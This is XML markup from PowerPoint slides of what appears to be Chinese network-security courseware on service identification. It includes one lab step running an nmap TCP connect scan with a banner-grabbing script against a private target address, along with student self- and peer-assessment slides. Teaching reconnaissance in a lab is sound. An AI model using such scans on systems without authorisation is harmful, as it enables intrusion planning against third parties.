          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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4" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.4 服务识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="文本框 99"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5233670" y="1569402"/>
            <a:ext cx="5080000" cy="922020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>使用命令“nmap -sT 192.168.172.130 -p 1-100 --script=banner”扫描目标Linux系统，获取服务的banner信息，如图2-2-66所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5233670" y="2491423"/>
            <a:ext cx="5238750" cy="2028825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5233670" y="4520248"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-2-66 nmap命令获取服务的banner信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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 name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目训练】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6786245" y="6761480"/>
            <a:ext cx="5080000" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" b="0">
              <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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5" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="3431540" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.2.4 服务识别</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101" name="文本框 100"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3488690" y="2784475"/>
            <a:ext cx="5396865" cy="460375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="2400" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>使用nmap获取获取服务的banner信息</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition>
    <p:random/>
  </p:transition>
  <p:timing>
    <p:tnLst>
      <p:par>
        <p:cTn id="1" dur="indefinite" restart="never" nodeType="tmRoot"/>
      </p:par>
    </p:tnLst>
  </p:timing>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a:xfrm>
            <a:off x="533756" y="1971129"/>
            <a:ext cx="4302496" cy="521035"/>
            <a:chOff x="6627851" y="1871939"/>
            <a:chExt cx="4302496" cy="521035"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="矩形: 圆角 26"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="1871939"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="round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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="矩形 3" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="2086269"/>
              <a:ext cx="3636897" cy="306705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="文本框 570"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7274400" y="1887541"/>
              <a:ext cx="1402080" cy="460375"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生自评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="文本框 571"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="1914354"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="533756" y="3513239"/>
            <a:ext cx="4302496" cy="524299"/>
            <a:chOff x="6627851" y="3492048"/>
            <a:chExt cx="4302496" cy="524597"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3709766"/>
              <a:ext cx="3636897" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3492048"/>
              <a:ext cx="1402080" cy="460637"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>学生互评</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="418704" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
